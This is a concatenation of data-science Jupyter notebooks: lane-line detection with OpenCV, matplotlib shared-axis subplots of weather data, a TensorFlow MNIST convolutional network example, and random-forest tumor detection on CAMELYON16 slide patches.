2, figsize=(20, 10)) ax1.imshow(img_with_region_lines) ax1.set_title('Undistorted Image with source points drawn') ax2.imshow(binary_warped, cmap='gray') ax2.set_title('Warped result with destination points drawn') plt.savefig('warped_binary.jpg') ###Output _____no_output_____ ###Markdown detect lane pixels ###Code def find_lane_pixels(binary_warped): histogram = np.sum(binary_warped[binary_warped.shape[0]//2:, :], axis=0) out_img = np.dstack((binary_warped, binary_warped, binary_warped)) midpoint = np.int(histogram.shape[0]//2) leftx_base = np.argmax(histogram[:midpoint]) rightx_base = np.argmax(histogram[midpoint:]) + midpoint nwindows = 9 margin = 100 minpix = 50 window_height = np.int(binary_warped.shape[0]//nwindows) nonzero = binary_warped.nonzero() nonzeroy = np.array(nonzero[0]) nonzerox = np.array(nonzero[1]) leftx_current = leftx_base rightx_current = rightx_base left_lane_inds = [] right_lane_inds = [] for window in range(nwindows): win_y_low = binary_warped.shape[0] - (window + 1)*window_height win_y_high = binary_warped.shape[0] - window*window_height win_xleft_low = leftx_current - margin win_xleft_high = leftx_current + margin win_xright_low = rightx_current - margin win_xright_high = rightx_current + margin cv2.rectangle(out_img, (win_xleft_low, win_y_low), (win_xleft_high, win_y_high), (0, 255, 0), 2) cv2.rectangle(out_img, (win_xright_low, win_y_low), (win_xright_high, win_y_high), (0, 255, 0), 2) good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xleft_low) & (nonzerox < win_xleft_high)).nonzero()[0] good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & (nonzerox >= win_xright_low) & (nonzerox < win_xright_high)).nonzero()[0] left_lane_inds.append(good_left_inds) right_lane_inds.append(good_right_inds) if len(good_left_inds) > minpix: leftx_current = np.int(np.mean(nonzerox[good_left_inds])) if len(good_right_inds) > minpix: rightx_current = np.int(np.mean(nonzerox[good_right_inds])) try: left_lane_inds = np.concatenate(left_lane_inds) right_lane_inds = np.concatenate(right_lane_inds) except ValueError: pass leftx = nonzerox[left_lane_inds] lefty = nonzeroy[left_lane_inds] rightx = nonzerox[right_lane_inds] righty = nonzeroy[right_lane_inds] return leftx, lefty, rightx, righty, out_img def fit_polynomial(binary_warped): leftx, lefty, rightx, righty, out_img = find_lane_pixels(binary_warped) left_fit = np.polyfit(lefty, leftx, 2) right_fit = np.polyfit(righty, rightx, 2) ploty = np.linspace(0, binary_warped.shape[0]-1, binary_warped.shape[0]) try: left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2] right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2] except TypeError: print('The function failed to fit a line!') left_fitx = 1 * ploty ** 2 + 1 * ploty right_fitx = 1 * ploty ** 2 + 1 * ploty out_img[lefty, leftx] = [255, 0, 0] out_img[righty, rightx] = [0, 0, 255] plt.plot(left_fitx, ploty, color='yellow') plt.plot(right_fitx, ploty, color='yellow') # Fit a second order polynomial to each left_fit_m = np.polyfit(lefty*ym_per_pix, leftx*xm_per_pix, 2) right_fit_m = np.polyfit(righty*ym_per_pix, rightx*xm_per_pix, 2) return out_img, left_fit, right_fit, left_fit_m, right_fit_m, ploty def space_thresh(img, thresh_min, thresh_max): binary = np.zeros_like(img) binary[(img >= thresh_min) & (img <= thresh_max)] = 1 return binary def abs_sobel_thresh(img, orient='x', thresh_min=0, thresh_max=255): gray = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY) sobelx = cv2.Sobel(gray, cv2.CV_64F, 1, 0) sobely = cv2.Sobel(gray, cv2.CV_64F, 0, 1) abs_sobelx = np.absolute(sobelx) abs_sobely = np.absolute(sobely) scaled_sobel = 0 if orient == 'x': scaled_sobel = np.uint8(255*abs_sobelx/np.max(abs_sobelx)) elif orient == 'y': scaled_sobel = np.uint8(255*abs_sobely/np.max(abs_sobely)) sxbinary = np.zeros_like(scaled_sobel) sxbinary[(scaled_sobel >= thresh_min) & (scaled_sobel <= thresh_max)] = 1 binary_output = np.copy(sxbinary) return binary_output sobelx_img = abs_sobel_thresh(binary_warped, 'x', 10, 100) plt.imshow(sobelx_img, cmap='gray') hls_image = cv2.cvtColor(binary_warped, cv2.COLOR_BGR2HLS) s_binary = space_thresh(hls_image[:, :, 2], 80, 255) #plt.imshow(s_binary, cmap='gray') out_img, left_fit, right_fit, left_fit_m, right_fit_m, proty = fit_polynomial(sobelx_img) plt.imshow(out_img) ###Output _____no_output_____ ###Markdown Determine the curvature of the lane and vehicle position with respect to center. ###Code def calc_curve(ym, left_fit_cr, right_fit_cr, ploty): # Calculation of R_curve (radius of curvature) ym_per_pix = 30/ym y_eval = np.max(ploty) left_curverad = ((1 + (2*left_fit_cr[0]*y_eval*ym_per_pix + left_fit_cr[1])**2)**1.5) / np.absolute(2*left_fit_cr[0]) right_curverad = ((1 + (2*right_fit_cr[0]*y_eval*ym_per_pix + right_fit_cr[1])**2)**1.5) / np.absolute(2*right_fit_cr[0]) return left_curverad / 1000, right_curverad / 1000 print(calc_curve(719, left_fit_m, right_fit_m, proty)) ###Output _____no_output_____ ###Markdown Output visual display of the lane boundaries and numerical estimation of lane curvature and vehicle position. ###Code def draw_line(img, left_fit, right_fit, left_fit_m, right_fit_m, plot): y_max = img.shape[0] ploty = np.linspace(0, y_max - 1, y_max) color_warp = np.zeros_like(img).astype(np.uint8) left_fitx = left_fit[0] * ploty ** 2 + left_fit[1]*ploty + left_fit[2] right_fitx = right_fit[0] * ploty ** 2 + right_fit[1]*ploty + right_fit[2] vehicle_center = img.shape[1] * xm_per_pix / 2 #middle = left_fitx + (right_fitx - left_fitx)/2 line_left = left_fit_m[0] * y_max * ym_per_pix ** 2 + left_fit_m[1] * y_max * ym_per_pix + left_fit_m[2] line_right = right_fit_m[0] * y_max * ym_per_pix** 2 + right_fit_m[1] * y_max * ym_per_pix + right_fit_m[2] middle = (line_right + line_left)/2 dist_from_center = middle - vehicle_center if dist_from_center > 0: message = '{:.2f} m right of center'.format(dist_from_center) else: message = '{:.2f} m left of center'.format(-1*dist_from_center) left, right = calc_curve(719, left_fit_m, right_fit_m, plot) # Recast the x and y points into usable format for cv2.fillPoly() pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))]) pts_right = np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))]) pts = np.hstack((pts_left, pts_right)) # Draw the lane onto the warped blank image cv2.fillPoly(color_warp, np.int_([pts]), (0,255, 0)) # Warp the blank back to original image space using inverse perspective matrix (Minv) newwarp = cv2.warpPerspective(color_warp, Minv, (img.shape[1], img.shape[0])) font = cv2.FONT_HERSHEY_SIMPLEX fontColor = (255, 255, 255) cv2.putText(img, 'Left curvature: {:.2f} km'.format(left), (50, 50), font, 2, fontColor, 2) cv2.putText(img, 'Right curvature: {:.2f} km'.format(right), (50, 120), font, 2, fontColor, 2) cv2.putText(img, 'Vehicle is {} '.format(message), (50, 190), font, 2, fontColor, 2) return cv2.addWeighted(img, 1, newwarp, 0.3, 0) output = draw_line(img, left_fit, right_fit, left_fit_m, right_fit_m, img.shape[0]*30/719) plt.imshow(output) ###Output _____no_output_____
General/Subplots and Shared Axes.ipynb
###Markdown Subplots and Shared Axes ###Code %matplotlib notebook import pandas as pd import numpy as np import matplotlib.pyplot as plt df = pd.read_csv('weather.csv') df.head() days = df[df['MONTH'].isin([1,7]) & (df['DAY'] == 1)].drop(columns='DAY') days = days.pivot(columns='MONTH',index='TIME') days.head() fig, ax = plt.subplots(2,2, sharey='row', sharex='col') days['TEMP'].plot(subplots=True, ax=ax[0], legend=False) days['PRESSURE'].plot(subplots=True, ax=ax[1], legend=False); ax[0][0].set_ylabel("Temperature") ax[0][0].set_title("January") ax[0][1].set_title("July") ax[1][0].set_ylabel("Pressure") ax[1][0].set_xlabel("Time") ax[1][1].set_xlabel("Time") fig.tight_layout() ###Output _____no_output_____
Lectures/Lecture-10/TensorFlow-Examples/3_NeuralNetworks/convolutional_network.ipynb
###Markdown Convolutional Neural Network ExampleBuild a convolutional neural network with TensorFlow.This example is using TensorFlow layers API, see 'convolutional_network_raw' examplefor a raw TensorFlow implementation with variables.- Author: Aymeric Damien- Project: https://github.com/aymericdamien/TensorFlow-Examples/ CNN Overview![CNN](http://personal.ie.cuhk.edu.hk/~ccloy/project_target_code/images/fig3.png) MNIST Dataset OverviewThis example is using MNIST handwritten digits. The dataset contains 60,000 examples for training and 10,000 examples for testing. The digits have been size-normalized and centered in a fixed-size image (28x28 pixels) with values from 0 to 1. For simplicity, each image has been flattened and converted to a 1-D numpy array of 784 features (28*28).![MNIST Dataset](http://neuralnetworksanddeeplearning.com/images/mnist_100_digits.png)More info: http://yann.lecun.com/exdb/mnist/ ###Code from __future__ import division, print_function, absolute_import # Import MNIST data from tensorflow.examples.tutorials.mnist import input_data mnist = input_data.read_data_sets("/tmp/data/", one_hot=False) import tensorflow as tf import matplotlib.pyplot as plt import numpy as np # Training Parameters learning_rate = 0.001 num_steps = 2000 batch_size = 128 # Network Parameters num_input = 784 # MNIST data input (img shape: 28*28) num_classes = 10 # MNIST total classes (0-9 digits) dropout = 0.25 # Dropout, probability to drop a unit # Create the neural network def conv_net(x_dict, n_classes, dropout, reuse, is_training): # Define a scope for reusing the variables with tf.variable_scope('ConvNet', reuse=reuse): # TF Estimator input is a dict, in case of multiple inputs x = x_dict['images'] # MNIST data input is a 1-D vector of 784 features (28*28 pixels) # Reshape to match picture format [Height x Width x Channel] # Tensor input become 4-D: [Batch Size, Height, Width, Channel] x = tf.reshape(x, shape=[-1, 28, 28, 1]) # Convolution Layer with 32 filters and a kernel size of 5 conv1 = tf.layers.conv2d(x, 32, 5, activation=tf.nn.relu) # Max Pooling (down-sampling) with strides of 2 and kernel size of 2 conv1 = tf.layers.max_pooling2d(conv1, 2, 2) # Convolution Layer with 64 filters and a kernel size of 3 conv2 = tf.layers.conv2d(conv1, 64, 3, activation=tf.nn.relu) # Max Pooling (down-sampling) with strides of 2 and kernel size of 2 conv2 = tf.layers.max_pooling2d(conv2, 2, 2) # Flatten the data to a 1-D vector for the fully connected layer fc1 = tf.contrib.layers.flatten(conv2) # Fully connected layer (in tf contrib folder for now) fc1 = tf.layers.dense(fc1, 1024) # Apply Dropout (if is_training is False, dropout is not applied) fc1 = tf.layers.dropout(fc1, rate=dropout, training=is_training) # Output layer, class prediction out = tf.layers.dense(fc1, n_classes) return out # Define the model function (following TF Estimator Template) def model_fn(features, labels, mode): # Build the neural network # Because Dropout have different behavior at training and prediction time, we # need to create 2 distinct computation graphs that still share the same weights. logits_train = conv_net(features, num_classes, dropout, reuse=False, is_training=True) logits_test = conv_net(features, num_classes, dropout, reuse=True, is_training=False) # Predictions pred_classes = tf.argmax(logits_test, axis=1) pred_probas = tf.nn.softmax(logits_test) # If prediction mode, early return if mode == tf.estimator.ModeKeys.PREDICT: return tf.estimator.EstimatorSpec(mode, predictions=pred_classes) # Define loss and optimizer loss_op = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits( logits=logits_train, labels=tf.cast(labels, dtype=tf.int32))) optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate) train_op = optimizer.minimize(loss_op, global_step=tf.train.get_global_step()) # Evaluate the accuracy of the model acc_op = tf.metrics.accuracy(labels=labels, predictions=pred_classes) # TF Estimators requires to return a EstimatorSpec, that specify # the different ops for training, evaluating, ... estim_specs = tf.estimator.EstimatorSpec( mode=mode, predictions=pred_classes, loss=loss_op, train_op=train_op, eval_metric_ops={'accuracy': acc_op}) return estim_specs # Build the Estimator model = tf.estimator.Estimator(model_fn) # Define the input function for training input_fn = tf.estimator.inputs.numpy_input_fn( x={'images': mnist.train.images}, y=mnist.train.labels, batch_size=batch_size, num_epochs=None, shuffle=True) # Train the Model model.train(input_fn, steps=num_steps) # Evaluate the Model # Define the input function for evaluating input_fn = tf.estimator.inputs.numpy_input_fn( x={'images': mnist.test.images}, y=mnist.test.labels, batch_size=batch_size, shuffle=False) # Use the Estimator 'evaluate' method model.evaluate(input_fn) # Predict single images n_images = 4 # Get images from test set test_images = mnist.test.images[:n_images] # Prepare the input data input_fn = tf.estimator.inputs.numpy_input_fn( x={'images': test_images}, shuffle=False) # Use the model to predict the images class preds = list(model.predict(input_fn)) # Display for i in range(n_images): plt.imshow(np.reshape(test_images[i], [28, 28]), cmap='gray') plt.show() print("Model prediction:", preds[i]) ###Output INFO:tensorflow:Restoring parameters from /tmp/tmpdhd6F4/model.ckpt-2000
notebooks/RFSegmentation.ipynb
###Markdown Patch stuff ###Code wsi = '/Z/personal-folders/interns/saket/histopath_data/CAMELYON16/training/tumor/tumor_005.tif' json_filepath = '/Z/personal-folders/interns/saket/histopath_data/CAMELYON16/training/lesion_annotations_json/tumor_005.json' savedir = '/Z/personal-folders/interns/saket/github/pyvirchow/data/wsi_heatmap_rf/' os.makedirs(savedir, exist_ok=True) img_mask_dir = '/Z/personal-folders/interns/saket/github/pyvirchow/data/patch_img_and_mask/' basename = path_leaf(wsi).replace('.tif', '') #if basename!= 'tumor_110': # continue patchsize = 256 saveto = os.path.join(savedir, basename + '.joblib.pickle') saveto_original = os.path.join(savedir, basename + '.original.joblib.pickle') all_samples = pd.read_table('/Z/personal-folders/interns/saket/github/pyvirchow/data/patch_df/tumor_005.tsv') if 'img_path' not in all_samples.columns: assert img_mask_dir is not None, 'Need to provide directory if img_path column is missing' tile_loc = all_samples.tile_loc.astype(str) tile_loc = tile_loc.str.replace(' ', '').str.replace( ')', '').str.replace('(', '') all_samples[['row', 'col']] = tile_loc.str.split(',', expand=True) all_samples['img_path'] = img_mask_dir + '/' + all_samples[[ 'uid', 'row', 'col' ]].apply( lambda x: '_'.join(x.values.tolist()), axis=1) + '.img.joblib.pickle' all_samples['mask_path'] = img_mask_dir + '/' + all_samples[[ 'uid', 'row', 'col' ]].apply( lambda x: '_'.join(x.values.tolist()), axis=1) + '.mask.joblib.pickle' if not os.path.isfile('/tmp/white.img.pickle'): white_img = np.ones( [patchsize, patchsize, 3], dtype=np.uint8) * 255 joblib.dump(white_img, '/tmp/white.img.pickle') # Definitely not a tumor and hence all black if not os.path.isfile('/tmp/white.mask.pickle'): white_img_mask = np.ones( [patchsize, patchsize], dtype=np.uint8) * 0 joblib.dump(white_img_mask, '/tmp/white.mask.pickle') all_samples.loc[all_samples.is_tissue == False, 'img_path'] = '/tmp/white.img.pickle' all_samples.loc[all_samples.is_tissue == False, 'mask_path'] = '/tmp/white.mask.pickle' for idx, row in all_samples.iterrows(): f = row['img_path'] if not os.path.isfile(f): row['savedir'] = img_mask_dir row['patch_size'] = patchsize row['index'] = idx save_images_and_mask(row) print(all_samples.head()) all_samples.to_csv('/Z/personal-folders/interns/saket/github/pyvirchow/data/patch_df/tumor_005_with_mask.tsv', index=False, header=True, sep='\t') testing_init_op, testing_next_batch = input_fn(['/Z/personal-folders/interns/saket/github/pyvirchow/data/patch_df/tumor_005_with_mask_segmented.tsv'], batch_size) tumor005_segdf = pd.read_table('/Z/personal-folders/interns/saket/github/pyvirchow/data/patch_df/tumor_005_segmented.fixed.segmented.tsv') tumor005_segdf.head() n_samples = len(tumor005_segdf.index) n_samples slide = WSIReader(wsi, 40) n_cols = int(slide.dimensions[0] / patchsize) n_rows = int(slide.dimensions[1] / patchsize) assert n_rows * n_cols == n_samples, 'Some division error;' print('Total: {}'.format(n_samples)) """ def generate_rows(samples, num_samples, batch_size=32): while True: # Loop forever so the generator never terminates for offset in range(0, num_samples, batch_size): batch_samples = samples.iloc[offset:offset + batch_size] is_tissue = batch_samples.is_tissue.tolist() is_tumor = batch_samples.is_tumor.astype('int32').tolist() features = [] batch_samples = batch_samples.copy().drop(columns=['is_tissue', 'is_tumor']) for _, batch_sample in batch_samples.iterrows(): row = batch_samples.values features.append(row) X_train = np.array(features) y_train = np.array(labels) yield X_train, y_train """ def generate_rows(samples, num_samples, batch_size=1): while True: # Loop forever so the generator never terminates for offset in range(0, num_samples, batch_size): batch_samples = samples.iloc[offset:offset + batch_size] #is_tissue = batch_samples.is_tissue.tolist() #is_tumor = batch_samples.is_tumor.astype('int32').tolist() features = [] labels = [] #batch_samples = batch_samples.copy().drop(columns=['is_tissue', 'is_tumor']) for _, batch_sample in batch_samples.iterrows(): row = batch_sample.values label = int(batch_sample.is_tumor) if batch_sample.is_tissue: feature = pd.read_table(os.path.join('/Z/personal-folders/interns/saket/github/pyvirchow', batch_sample.segmented_tsv)) feature = feature.drop(columns=['is_tumor', 'is_tissue']) assert len(feature.columns) == 46 features.append(feature.loc[0].values) else: values = [0.0]*46 features.append(values) labels.append(label) X_train = np.array(features, dtype=np.float32) y_train = np.array(labels) #print(X_train) #print(y_train) yield X_train, y_train predicted_thumbnails = list() batch_size = 1 """ sess.run(testing_init_op) while True: try: testing_features_batch, testing_label_batch = sess.run(testing_next_batch) except tf.errors.OutOfRangeError: break preds = sess.run(infer_op, feed_dict={X: testing_features_batch}) predicted_thumbnails.append(preds) """ true_labels = [] for offset in tqdm_notebook(list(range(0, n_samples, batch_size))): batch_samples = tumor005_segdf.iloc[offset:offset + batch_size] X_test, true_label = next( generate_rows(batch_samples, batch_size)) true_labels.append(true_label) if batch_samples.is_tissue.nunique( ) == 1 and batch_samples.iloc[0].is_tissue == False: # all patches in this row do not have tissue, skip them all #predicted_thumbnails.append( # np.zeros(batch_size, dtype=np.float32)) predicted_thumbnails.append(0) else: preds = sess.run(infer_op, feed_dict={X: X_test}) predicted_thumbnails.append(preds[0][1]) predicted_thumbnails = np.asarray(predicted_thumbnails) savedir = '/Z/personal-folders/interns/saket/github/pyvirchow/data/wsi_heatmap_rf' saveto = os.path.join(savedir, 'tumor_005.job.pickle') os.makedirs(savedir, exist_ok=True) output_thumbnail_preds = predicted_thumbnails.reshape( n_rows, n_cols) joblib.dump(output_thumbnail_preds, saveto) fig, ax = plt.subplots() sns.set_style('white') x = ax.imshow(output_thumbnail_preds, cmap='coolwarm') plt.colorbar(x) fig.tight_layout() fig, ax = plt.subplots() sns.set_style('white') x = ax.imshow(output_thumbnail_preds > 0.5, cmap='gray') #plt.colorbar(x) fig.tight_layout() saver = tf.train.Saver() saver.save(sess, '/Z/personal-folders/interns/saket/github/pyvirchow/models/random_forest_all_train.tf.model') df = pd.read_table('../data/patch_df/tumor_001_with_mask_segmented.segmented.tsv') df1 = df[df.segmented_tsv==df.segmented_tsv] df1.head() x = pd.read_table(df1.loc[693, 'segmented_tsv']) x x = pd.read_table('/Z/personal-folders/interns/saket/github/pyvirchow/data/patch_segmented_tumor001/tumor_001_75_63.segmented_summary.tsv') x train_samples from sklearn.ensemble import RandomForestClassifier from sklearn.model_selection import cross_val_score from sklearn.datasets import make_blobs from sklearn.ensemble import RandomForestClassifier from sklearn.ensemble import ExtraTreesClassifier from sklearn.tree import DecisionTreeClassifier from sklearn.metrics import accuracy_score from sklearn.metrics import confusion_matrix clf = RandomForestClassifier(n_jobs=-1, random_state=0) features = train_samples.columns clf.fit(train_samples.loc[:, features[1:]], train_samples.is_tumor) predictions = clf.predict(validation_samples.loc[:, features[1:]]) print ("Train Accuracy :: {} ".format(accuracy_score(train_samples.is_tumor, clf.predict(train_samples.loc[:, features[1:]])))) print ("Test Accuracy :: {} ".format(accuracy_score(validation_samples.is_tumor, predictions))) importances = clf.feature_importances_ indices = np.argsort(importances)[::-1] importances for f in range(train_samples.shape[1]-1): print("%d. feature %s (%f)" % (f + 1, train_samples.columns[indices[f]+1], importances[indices[f]])) std = np.std([tree.feature_importances_ for tree in clf.estimators_], axis=0) sns.set_context('talk', font_scale=2) sns.set_style('white') fig, ax = plt.subplots(figsize=(10, 10)) ax.set_title('Feature importances') ax.barh(list(features[1:][indices])[:15],list(importances[indices])[:15], yerr=list(std[indices])[:15], align="center") #ax.set_xticks(range(X.shape[1]), indices) fig.tight_layout() fig.savefig('presentation_images/rf_feature_importances.pdf') ###Output _____no_output_____